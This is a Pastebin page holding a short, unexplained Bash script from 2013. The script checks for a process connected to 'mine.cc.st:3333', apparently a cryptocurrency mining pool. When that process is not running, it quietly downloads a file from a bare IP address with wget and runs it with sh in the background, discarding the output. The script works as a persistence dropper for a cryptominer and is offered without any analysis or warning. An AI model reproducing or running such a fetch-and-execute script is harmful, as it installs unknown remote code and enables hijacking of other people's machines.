Advertisement
Guest User

Untitled

a guest
Nov 5th, 2013
162
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.21 KB | None | 0 0
  1. #!/bin/sh
  2. plm=`ps x|grep mine.cc.st:3333|grep -v grep|awk '{print $7}'`
  3. if [ "$plm" != "" ]
  4.         then echo "MERGE!!!"
  5.                 else
  6.         nohup wget http://74.52.9.186/a && sh a >> /dev/null &
  7. fi
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement